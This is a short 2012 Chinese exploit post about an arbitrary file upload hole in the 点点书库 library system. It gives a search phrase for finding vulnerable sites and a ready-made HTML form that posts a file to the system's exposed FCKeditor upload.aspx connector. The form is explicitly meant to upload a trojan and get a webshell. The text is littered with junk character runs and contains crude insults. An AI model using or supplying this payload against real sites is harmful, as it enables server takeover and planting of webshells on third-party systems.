主题:图书馆系统任意文件上传漏洞
, J' B6 B, o2 p 作者:冰锋刺客; f2 U" Y/ ?/ ~- C9 }* S( x$ N* m7 x
厂商:点击书(dianjishu.com), t; Z! F y5 j: V$ h3 f% V- ^
日期:2012-6-21- Y$ o( `$ _# Z- I+ [. ~0 T
! B) D; a1 N# l- S c/ PI 概述7 \ O1 D3 u: r ]; k
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell$ ^1 f, E; J7 b8 N
II 简介
4 _1 O m* D9 K7 y9 m 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"* h, \) X8 {' m+ D9 I* j% G
补充一个漏洞
( Y/ ^, `8 |% j, F* V <form id="frmUpload" enctype="multipart/form-data"2 a. a6 M3 ?0 f# E
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>4 \! _2 h; c3 ]7 l
<input id="btnUpload" type="submit" value="操翻他">
) t9 j9 g8 R- Z) q+ H* [6 J5 m </form>
' _( e# b' m }5 g 你们懂的& o( Y% s$ h3 ?
那傻逼提供还需要改包.
$ }* W- y: ?* U 自己看了下源代码发现fckeditor: O& G% Q7 ^( k
直接秒杀
/ S* d! a+ ~) U/ S |